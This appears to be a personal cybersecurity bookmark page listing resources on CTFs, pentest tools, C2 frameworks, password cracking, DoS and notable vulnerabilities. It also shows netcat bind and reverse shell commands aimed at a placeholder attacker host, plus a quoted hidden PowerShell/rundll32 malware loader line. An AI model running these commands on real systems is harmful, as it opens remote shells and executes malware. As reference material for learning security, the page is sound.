Skip to content

Cyber Security

November 22, 2023
December 31, 2022

ssl-tls
web-security
web-authentication

Cyber attack lifecycle/kill chain

Computer security - Wikiwand
Information security - Wikiwand

How do hackers get caught? - the hunt for the hacker. - YouTube
I wouldn’t give this cable to my worst enemy - O.MG Cable - YouTube

What's The Difference Between Cybersecurity Vs Information Security?
Cyber security targets online threats while information security takes a holistic approach.

carpedm20/awesome-hacking: A curated list of awesome Hacking tutorials, tools and resources
onlurking/awesome-infosec: A curated list of awesome infosec courses and training resources.

DEFCONConference - YouTube

Black Hat | Home

hak5
Official PCI Security Standards Council Site - Verify PCI Compliance, Download Data Security and Credit Card Security Standards
MITRE ATT&CK®
#1 Crowdsourced Cybersecurity Platform | Bugcrowd

The Daily Swig | Cybersecurity news and views
WhiteHat Security Blog

0x00sec - The Home of the Hacker
0x00pf/0x00sec_code: Code for my 0x00sec.org posts
Topics - Activity - 0x00pf - 0x00sec - The Home of the Hacker
Topics - Activity - Danus - 0x00sec - The Home of the Hacker

Cybersecurity and Its Ten Domains - University System of Georgia | Coursera
Altered Security: Hands-On Enterprise Security and Red Team Labs Windows attacks
Welcome to the Red Canary 2023 Threat Detection Report Windows attacks
HackTricks - HackTricks

The Protection of Information in Computer Systems (PDF)

Feisty Duck: Fine computer security and open source books

Identity eats security: How identity management is driving security | CSO Online detect intrusion beyond authentication

10 Ways to Keep a Rogue RasPi From Wrecking Your ...

Palo Alto’s 134-slide presentation reveals the insides of the global cyber market | Ctech market size

Glossaries

APT: Advanced Persistent Threat
CISA: Cybersecurity and Infrastructure Security Agency
DFIR: Digital Forensics and Incident Response
EDR: Endpoint Detection and Response
ETDR: Endpoint Threat Detection and Response
MSP: Managed Service Provider
MSSP: Managed Security Service Provider
RAT: Remote Administration Tool
RCE: Remote Code Execution
RMM: Remote Management and Monitoring
SIEM: Security Information and Event Management
SOC: Security Operation Center
TTP: Tactics, Techniques, and Procedures (from MITRE ATT&CK)

DevSecOps

What Is DevSecOps?
4 Key Differences Between DevOps and DevSecOps | Boot.dev

Security as Code Protects Rapidly Developing Cloud Native Architectures - The New Stack
Product | Security as Code - oak9

DevSecOps Tools | Atlassian

Courses/Videos

TryHackMe | Cyber Security Training

Hack The Box: Hacking Training For The Best | Individuals & Companies
hack the box - YouTube

Yizheng's Homepage

Dashboard | HackerRank

The Defenders Movie | Cybersecurity Documentary
Douglas Crockford: Principles of Security - YouTube
The Lazy Programmer's Guide to Secure Computing - YouTube
An Overview of the Security Ecosystem in Programming - via @codeship | via @codeship

3 FREE Resources for Cyber Defenders - YouTube
The DFIR Report - Real Intrusions by Real Attackers, The Truth Behind the Intrusion real world attack reports

MalwareTech - Everything Cyber Security the guy who disabled WannaCry
Marcus Hutchins - YouTube
InsiderPhD - YouTube
IppSec - YouTube HackTheBox
HackOvert - YouTube
John Hammond - YouTube JohnHammond - GitHub
NetworkChuck - YouTube
Ethical Hacking Full Course - Learn Ethical Hacking in 10 Hours | Ethical Hacking Tutorial | Edureka - YouTube

Jack Rhysider - YouTube hacker story

Pentester Academy TV - YouTube also on embedded Linux
PentesterAcademy Labs - YouTube

jhaddix - YouTube
Jason Haddix - Bug Hunter's Methodology (Series) - YouTube

thehackerish - YouTube
Web hacking training [hands-on] - YouTube
Live hacking sessions - YouTube

David Bombal - YouTube
The best Hacking Courses & Certs (not all these)? Your roadmap to Pentester success. - YouTube
2023 Roadmap to Master Hacker - YouTube
Real World Hacking Demo with OTW - YouTube

Juniper Networks Training Course Catalog free courses
Get Started with Free Juniper Training

qwqdanchun RED team, releasing attack tools
恶意软件学习笔记 - Malware Note

CTF/Labs

CTFtime.org / All about CTF (Capture The Flag)

Bienvenue [Root Me : plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information]

Pay What You Can – Antisyphon Training pay what you can, free tier available

Pentester Academy's AttackDefense Lab
PentesterAcademy Labs - YouTube
Pentester Academy Blog

Cybersecurity Labs (FOR FREE) - Linux Backdoor Analysis - YouTube
IntroLabs/IntroClassFiles/navigation.md at master · strandjs/IntroLabs
ClassLabs/navigation.md at main · strandjs/ClassLabs

Ne0Lux-C1Ph3r/WRITE-UP: Write up CTF

Introduction · CTF Field Guide source
trailofbits/ctf-challenges: CTF Challenges

CTF 2023 - Capture the Flag Challenge

Fetch the Flag
Getting started with CTF | Snyk
Snyk | Capture the Flag Workshop
Fetch the Flag CTF 2023 | Snyk

picoCTF - CMU Cybersecurity Competition
picoCTF - Learning Resources
The CTF Primer

Katana - Automatic CTF Challenge Solver — Katana 1.0 documentation
JohnHammond/katana: Katana - Automatic CTF Challenge Solver in Python3
RsaCtfTool/RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data

JohnHammond/ctf-katana: This repository aims to hold suggestions (and hopefully/eventually code) for CTF challenges. The "project" is nicknamed Katana. the concept
JohnHammond/labs: Free and publicly available training labs and exercises, for quick copy-and-paste demonstrations, learning and education.

Google CTF
PwnFunction - YouTube
LiveOverflow - YouTube

I Hacked & Exposed This Evil Website for Educational Purposes. - YouTube

Supply Chain Attack

copyright-open-source#Software BOM (bill of material)

Open Source & Software Supply Chain Risks Blog | Synopsys
Snyk Vulnerability Database | Snyk

npm audit: Broken by Design — Overreacted audit tools should not cause noise

Cybersec Tools

The Tool Box - YouTube
19 open source GitHub projects for security pros | InfoWorld

How to Proxy Command Execution: "Living Off The Land" Hacks - YouTube
GTFOBins Linux
LOLBAS Windows

penetration testing - freeCodeCamp.org

swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

DMitry - Deepmagic Information Gathering Tool
godaddy/procfilter: A YARA-integrated process denial framework for Windows
The Bro Network Security Monitor

Sigma - SIEM Detection Format | The shareable detection format for security professionals.
SigmaHQ/sigma-cli: The Sigma command line interface based on pySigma

YARA - The pattern matching swiss knife for malware researchers
Welcome to YARA’s documentation!
matonis/yara_tools: Create an entire YARA rule via Python? Whhhhhhaatttt?
Applied YARA training
yara Archives | APNIC Blog
Classify Malware with YARA - YouTube
Classify Malware with YARA - YouTube

VirusTotal
API Scripts and client libraries – VirusTotal
Compliant, easy and actionable integration of VirusTotal in 3rd-party products - Welcome VT Augment ~ VirusTotal Blog

trustedsec/ptf: The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools.

Home - Open Source Security Foundation
Who we are and what we do | The Hacker’s Choice

fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

pr4jwal/quick-scripts: A collection of my quick and dirty scripts for vulnerability POC and detections
CISOfy/lynis: Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.

GAUNTLT - Go Ahead, Be Mean To Your Code - Security and Rugged Testing
gauntlt/gauntlt: a ruggedization framework that embodies the principle "be mean to your code"

Wazuh · The Open Source Security Platform
Improve your security posture with Wazuh, a free and open source XDR

Recon

Real World Hacking Tools Tutorial (Target: Tesla) - YouTube
Open Source Intelligence (OSINT)

BuiltWith Technology Lookup GA code lookup
Shodan Search Engine infrastructure lookup
WHOIS API | WHOIS Lookup API | Domain WHOIS API reverse whioi
Home • Directory Lister
TLS cert scan on AWS IP

Remote Administration Tool (RAT)

Remcos | Remote Control & Surveillance Software

quasar/Quasar: Remote Administration Tool for Windows

EDR

AURORA Agent - Nextron Systems
Aurora Agent User Manual — Aurora Agent User Manual documentation
sigma/rules at master · SigmaHQ/sigma

Detect Hackers & Malware on your Computer (literally for free) - YouTube

IDS/IPS

Home - Suricata
IPS inline mode

Snort - Network Intrusion Detection & Prevention System

CrowdSec - The open-source & collaborative security suite
How to Install and Configure CrowdSec on OPNsense

Wazuh

Wazuh - Open Source XDR. Open Source SIEM.

Wazuh GitHub Org
wazuh/wazuh-ruleset: Wazuh - Ruleset

KASM

Kasm Workspaces | The Container Streaming Platform

Kasm Workspaces: Your Solution for Remote Desktops? Full Review! - YouTube
create the ULTIMATE hacking lab in 5min!! (Docker Containers STREAMING Kali Linux to your browser) - YouTube

Kali Linux

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Kali Tools | Kali Linux Tools

kali-tweaks

An introduction to Kali Linux - Help Net Security
5 Kali Linux tools you should learn how to use - Help Net Security
University of Kali Linux - YouTube

Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf modules to Kali Linux send all traffic via Tor network

介紹 | 大学霸 Kali Linux 安全渗透教程

Metasploit

Penetration Testing Software | Metasploit
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

How to Hack Like a Pro: Getting Started with Metasploit « Null Byte :: WonderHowTo
Metasploit — A Walkthrough Of The Powerful Exploitation Framework

Living off the land

living off the land: using tools at victim machine

andrew-d/static-binaries: Various *nix tools built as statically-linked binaries

LOLBAS Living Off The Land Binaries, Scripts and Libraries, for Windows

DDExec

arget13/DDexec: A technique to run binaries filelessly and stealthily on Linux by "overwriting" the shell's process with another.
Run ANY Linux Program In Memory - YouTube

Vulnerability scanner

OpenVAS

411Hall/JAWS: JAWS - Just Another Windows (Enum) Script
carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
Linux Privilege Escalation with LinEnum | by Trevor Cohen | Medium

trufflesecurity/trufflehog: Find credentials all over the place
RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.

SCARLETEEL: Operation leveraging Terraform, Kubernetes, and AWS for data theft – Sysdig

chaitin/xray: 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档

Honeypot

paralax/awesome-honeypots: an awesome list of honeypot resources

Kippo - SSH Honeypot

telekom-security/tpotce: 🍯 T-Pot - The All In One Honeypot Platform 🐝
tpotce v22.04.0 releases: The All In One Honeypot Platform • Penetration Testing
30 天蜜罐品嘗 :: 第 11 屆 iThome 鐵人賽

Honeynet Project

The Honeynet Project
The Honeynet Project GitHub Org

Glutton 1.0 Release
mushorg/glutton: Generic Low Interaction Honeypot
honeynet/ochi UI for events from Glutton

kung-foo/freki: Freki is a tool to manipulate packets in usermode using NFQUEUE and golang.

Bind/Remote shell

Bind shell: attacker connect to victim
Remote shell: victim connect to attacker

Reverse Shell Cheat Sheet | pentestmonkey

Difference Between Bind Shell and Reverse Shell - GeeksforGeeks
Bind Shell 與 Reverse Shell | Puck's Blog
hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks

Remote Shells. Part I - Networking - 0x00sec - The Home of the Hacker
Remote Shells. Part II. Crypt your link - Networking - 0x00sec - The Home of the Hacker
Remote Shells Part III. Shell Access your Phone - Networking - 0x00sec - The Home of the Hacker

Online - Reverse Shell Generator
how to get remote access to your hacking targets // reverse shells with netcat (Windows and Linux!!) - YouTube

# [victim] bind shell, forward input to `sh`
nc -lvnp 5555 -e sh

# [attacker]
nc VICTIM 5555
# [attacker]
nc -lvnp 5555

# [victim] remote shell, forward input to `sh`
nc ATTACKER 5555 -e sh

t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

calebstewart/pwncat: Fancy reverse and bind shell handler

Password Hacking

web-authentication#Active Directory

Password Hacking in Kali Linux - YouTube

Hacking Complex Passwords with Rules & Munging - YouTube

Hydra

ssh brute force

hydra | Kali Linux Tools
SSH Password Testing With Hydra on Kali Linux - Linux Tutorials - Learn Linux Configuration
How to Use Hydra  to Hack Passwords – Penetration Testing Tutorial

Hydra - SSH BruteForce - YouTube
How to HACK Website Login Pages | Brute Forcing with Hydra - YouTube

John The Ripper

John the Ripper documentation
How to Crack Passwords using John The Ripper – Pentesting Tutorial

Dictionary attack

dump hashes
impacket/examples/secretsdump.py at master · fortra/impacket · GitHub

cupp: generate passwords dictionary
how to HACK a password // Windows Edition - YouTube

Hashcat: dictionary attack
how to HACK a password // password cracking with Kali Linux and HashCat - YouTube

Pivoting/Tunneling/Proxy

ssh#SSH Tunneling
Tunneling Through Protected Networks | Master Network Pivoting - YouTube

Chisel

reverse tunnel, socks proxy

jpillora/chisel: A fast TCP/UDP tunnel over HTTP
How To Pivot Through a Network with Chisel - YouTube

Pivoting with Chisel | Ap3x Security
Pivoting with Chisel

PayloadsAllTheThings/Methodology and Resources/Network Pivoting Techniques.md at master · swisskyrepo/PayloadsAllTheThings

proxychains

CLI command wrapper

haad/proxychains: proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: "user/pass" for SOCKS4/5, "basic" for HTTP.
rofl0r/proxychains-ng: proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead.
How do those hackers' tools work? Proxychains - Programming - 0x00sec - The Home of the Hacker
2.4 设置 ProxyChains | 大学霸 Kali Linux 安全渗透教程

learning hacking? DON'T make this mistake!! (hide yourself with Kali Linux and ProxyChains) - YouTube

Browser

FoxyProxy - Home
FoxyProxy Standard - Chrome Web Store
FoxyProxy Standard – Get this Extension for 🦊 Firefox (en-US)

C2 Server

Havoc
HavocFramework/Havoc: The Havoc Framework.

Sliver | Bishop Fox
BishopFox/sliver: Adversary Emulation Framework
HTTP(S) C2 · BishopFox/sliver Wiki
Sliver C2 — Modern Command and Control Exploitation Framework | by Yua Mikanana | Sep, 2023 | Medium

Global Socket | Connect like there is no firewall. Securely.
hackerschoice/gsocket: Connect like there is no firewall. Securely. gs-netcat

ldcsaa/HP-Socket: High Performance TCP/UDP/HTTP Communication Component

Embedded Systems

Hardware Hacking: UART Magic with Alxhh | Bugcrowd
Breaking into an Embedded Linux System eBook QEMU setup

Make Me Hack - YouTube QEMU and hardware hacking

How We Hacked a TP-Link Router and Took Home $55,000 in Pwn2Own - YouTube
Hacker's Guide to UART Root Shells - YouTube

Introduction to Firmware Reversing - YouTube
Intro to Hardware Reversing: Finding a UART and getting a shell - YouTube

HackRF

Welcome to HackRF’s documentation! — HackRF documentation

hackrf · GitHub Topics · GitHub
dressel/pyhackrf: A Python wrapper for libhackrf

pothosware/SoapySDR: Vendor and platform neutral SDR support library.
Home · pothosware/SoapySDR Wiki · GitHub

Software Defined Radio with HackRF - Great Scott Gadgets

Zero Trust Network

IP address, network id
Workload id, service id

Zero Trust: Time to Get Rid of Your VPN – The New Stack
ZTNA: What is Zero Trust Network Access? | Twingate
Tailscale: A Virtual Private Network for Zero Trust Security – The New Stack
Why zero-trust models should replace legacy VPNs
Zero Trust Maturity Model | CISA
The Death of the Corporate Network
Architecting Network Connectivity for a Zero Trust Future | Twingate
Why Access Management Is Step One for Zero Trust Security – The New Stack

Guest Blog: k8s tunnels with Kudelski Security

SPIFFE

SPIFFE – Secure Production Identity Framework for Everyone
spiffe/spiffe: The SPIFFE Project

SPIFFE in a Nutshell - Pushpalanka Jayawardhana - Medium
Sunil James, CEO of Scytale, Explains SPIFFE - The New Stack


Attacks/Vulnerbilities

Vulnerabilities and Exploits — ENISA
Zero-Day — ENISA

Home | CVE
CVE - CVE
CWE - Common Weakness Enumeration

Vulhub - Docker-Compose file for vulnerability environment
vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
Exploit-DB / Exploits + Shellcode + GHDB · GitLab

trailofbits/not-going-anywhere: A set of vulnerable Golang programs
trailofbits/not-slithering-anywhere: The Python Version of our Not Go-ing Anywhere Vulnerable Application

Introduction - Building Secure Contracts
crytic/building-secure-contracts: Guidelines and training material to write secure smart contracts
crytic/awesome-ethereum-security: A curated list of awesome Ethereum security references

首页 | 离别歌 PHITHON
首页 - 『代码审计』知识星球

Paper
PHITHON 的公开漏洞
Paper - Phith0n

Google Hacking Database (GHDB)
Exploit DB
SHODAN

PHP

Docker PHP 裸文件本地包含综述 | 离别歌 pearcmd.php RCE
Website Vulnerabilities to Fully Hacked Server - YouTube

DoS/DDoS

Denial-of-service attack - Wikiwand
SYN flood - Wikiwand
How to Prevent DDoS Attacks: 7 Tried-and-Tested Methods
How to Stop a DDoS Attack: 4 Steps to Take Now
How to Stop DDoS Attacks: 6 Tips for Fighting DDoS Attacks

Best Practices: DDoS preventative measures – Cloudflare Help Center
Cloudflare thwarts 17.2M rps DDoS attack — the largest ever reported

LOIC download | SourceForge.net
Low Orbit Ion Cannon - Wikiwand
What is LOIC - Low Orbit Ion Cannon | DDoS Tools | Imperva

Slowloris (computer security) - Wikiwand
Slowloris HTTP DoS
gkbrk/slowloris: Low bandwidth DoS tool. Slowloris rewrite in Python.

Buffer Overflow

Writing buffer overflow exploits - a tutorial for beginners

HACKED! How a Buffer Overflow Exploit works, plus Code Red! - YouTube

Timing attacks

A Lesson In Timing Attacks (or, Don’t use MessageDigest.isEquals) | codahale.com

Use time difference in array comparison to brute force the digest byte by byte.

Code and Process Injection

Code & Process Injection - Red Team Notes
CreateRemoteThread Shellcode Injection - Red Team Notes
sample of shellcode injection into a process (Gray Hat Python)

ELFun File Injector - Malware - 0x00sec - The Home of the Hacker
User Mode Rootkits: IAT and Inline Hooking - Malware - 0x00sec - The Home of the Hacker
Process Injection: APC Injection - Malware - 0x00sec - The Home of the Hacker
Process Injection: Remote Thread Injection or CreateRemoteThread | Alion’s Blog

Docker Security: Docker Breakouts : Process Injection - YouTube
[Linux] Infecting Running Processes - Programming - 0x00sec - The Home of the Hacker
Programming for Wannabees. Part III. Your first Shell Code - Programming - 0x00sec - The Home of the Hacker
Linux Shellcoding (Part 1.0) - Exploit Development - 0x00sec - The Home of the Hacker

Heartbleed

Heartbleed Bug
Heartbleed - Wikiwand
Heartbleed – Andrew Kennedy

xkcd: Heartbleed Explanation
Heartbleed Report (2017-01) - Shodan

How I used Heartbleed to steal a site’s private crypto key – Ars Technica
Critical crypto bug exposes Yahoo Mail, other passwords Russian roulette-style | Ars Technica
Coder in a World of Code: My Heart Bleeds for OpenSSL

Shellshock

Shellshock (software bug) - Wikiwand

The Shellshock Bug In About Four Minutes - YouTube
Shellshock DIY – Andrew Kennedy
Troy Hunt: Everything you need to know about the Shellshock Bash bug
How to Protect Your Server Against the Shellshock Bash Vulnerability | DigitalOcean
Shellshock DHCP RCE Proof of Concept - TrustedSec - Information Security

BREACH

BREACH ATTACK
BREACH (security exploit) - Wikiwand

Stuxnet

Stuxnet - Wikiwand
Stuxnet: a 3-Parts Series | Curious Minds - Curious Minds Podcast
Stuxnet: Advanced Persistent Threat - Ran Levi
The Most Sophisticated Malware Ever Made (That We Know Of)🎙Darknet Diaries Ep. 29: Stuxnet - YouTube

Row Hammering//Drammer/RAMpage

Row hammer - Wikiwand

Physical RAM attack can root Android and possibly other devices | InfoWorld
Google researchers hack computers using DRAM electrical leaks | Computerworld
Researchers develop astonishing Web-based attack on a computer's DRAM | Computerworld
Drammer: Deterministic Rowhammer Attacks on Mobile Platforms PDF
New Drammer Android Hack lets Apps take Full control (root) of your Phone
vusec/drammer: Native binary for testing Android phones for the Rowhammer bug

RAMPAGE AND GUARDION
Every Android Device Since 2012 Impacted by RAMpage Vulnerability

Dirty COW

Dirty COW (CVE-2016-5195)
Dirty COW - Wikiwand

Meltdown and Spectre

Two major computer processor security bugs, dubbed Meltdown and Spectre, affect nearly every device made in the last 20 years.

What Is Speculative Execution? - ExtremeTech

Meltdown and Spectre
Spectre & Meltdown - Computerphile - YouTube
Meltdown: the latest news on two major CPU security bugs - The Verge
Meltdown, Spectre: The password theft bugs at the heart of Intel CPUs • The Register

What are the Meltdown and Spectre exploits? | Network World
New Spectre derivative bug haunts Intel processors | Network World
Microsoft, Google: We've found a fourth data-leaking Meltdown-Spectre CPU hole • The Register

Spectre/Meltdown/L1TF/MDS Mitigation Costs On An Intel Dual Core + HT Laptop - Phoronix
The Performance Impact Of MDS / Zombieload Plus The Overall Cost Now Of Spectre/Meltdown/L1TF/MDS - Phoronix

speed47/spectre-meltdown-checker: Spectre & Meltdown vulnerability/mitigation checker for Linux
IAIK/meltdown: This repository contains several applications, demonstrating the Meltdown bug.

MDS/ZombieLoad

MDS Attacks: Microarchitectural Data Sampling
ZombieLoad Attack

Microarchitectural Data Sampling (aka MDS, ZombieLoad, RIDL & Fallout) explained by Red Hat - YouTube
Buffer the Intel flayer: Chipzilla, Microsoft, Linux world, etc emit fixes for yet more data-leaking processor flaws • The Register
Intel CPUs impacted by new Zombieload side-channel attack | ZDNet

Intel Side Channel Vulnerability MDS
Deep Dive: Intel Analysis of Microarchitectural Data Sampling

RIP Hyper-Threading? ChromeOS axes key Intel CPU feature over data-leak flaws – Microsoft, Apple suggest snub • The Register

Intel CPUs can be exploited unless you disable hyper-threading, Linux dev claims | TechRadar


Static Analysis/Source Code Analysis

"Source code security audit speed run" - Eldar Marcussen - YouTube

Awesome Rank for mre/awesome-static-analysis
analysis-tools-dev/static-analysis: ⚙️ A curated list of static analysis (SAST) tools for all programming languages, config files, build tools, and more. The focus is on tools which improve code quality.
Source Code Analysis Tools | OWASP Foundation

How to Analyze Code for Vulnerabilities - YouTube
Is this okay!? How to review code for security issues - Rouan Wilsenach - NDC Security 2023 - YouTube

Snyk Open Source Advisor | Snyk

Semgrep — Find bugs and enforce code standards
Explore | Semgrep
trailofbits/semgrep-rules: Semgrep queries developed by Trail of Bits.

ShiftLeft Inc. webgoat and tarpit
ShiftLeftSecurity/tarpit-java
ShiftLeftSecurity/tarpit-nodejs
ShiftLeftSecurity/tarpit-python
ShiftLeftSecurity/flask-webgoat

Many provide free service for open source projects

Codecov - Code Coverage
Coveralls - Test Coverage History & Statistics
Code Climate. Hosted static analysis for Ruby, PHP and JavaScript source code.
Dependency management + Code analytics for Node.js projects
Codacy | The fastest static analysis tool from setup to first analysis | Codacy
Code Quality and Code Security | SonarQube

Snyk | Developer Security | Develop Fast. Stay Secure.
snyk - npm

npm install -g snyk
cd your-app
snyk test
snyk wizard

chrisallenlane/drek: A static-code-analysis tool for performing security-focused code reviews. It enables an auditor to swiftly map the attack-surface of a large application, with an emphasis on identifying development anti-patterns and footguns. glorified grep
Source Code Auditing - YouTube

wireghoul/graudit: grep rough audit - source code auditing tool

How to Analyze Code for Vulnerabilities - YouTube
Powering up your source code auditing with parsers - YouTube Lazy Bloodhound, build on tree-sitter, for PHP

How to Analyze Code for Vulnerabilities - YouTube

pip audit
npm audit

Malware

MalwareTech
Malwarebytes Labs - The Security Blog From Malwarebytes | Malwarebytes Labs

Maldev Academy

How Hackers Use netsh.exe For Persistence & Code Execution (Sliver C2) - YouTube

The Cycle of Cyber Threat Intelligence - YouTube

The Art Of Malware - Bringing the dead back to life - Malware - 0x00sec - The Home of the Hacker old malware
Analyzing Modern Malware Techniques - Part 1 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 2 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 3 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 4 - Malware - 0x00sec - The Home of the Hacker

Database/Repo

URLhaus | Browse

Windows malware execution

Hackers Have a New Strategy - How to Defend Against It - YouTube
Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware

C:\Windows\System32\cmd.exe /c powershell -WindowStyle Hidden -Command ".\7za.exe x archive.7z -pFhu$$57csa -o\"c:\programdata\" -y > $null; rundll32 c:\programdata\19a.dll,oxgdXPSGPw

Obfuscation/Evasion

John Hammond
How Hackers & Malware Spoof Processes - YouTube
How Hackers Write Malware & Evade Antivirus (Nim) - YouTube
How Does Malware Know It's Being Monitored? - YouTube

IoT Malware

IoT Malware Droppers (Mirai and Hajime) - Malware - 0x00sec - The Home of the Hacker
jgamblin/Mirai-Source-Code: Leaked Mirai Source Code for Research/IoC Development Purposes

Binary Analysis/Malware Analysis/Reverse Engineering

reverse-engineering

Prover

math#Prover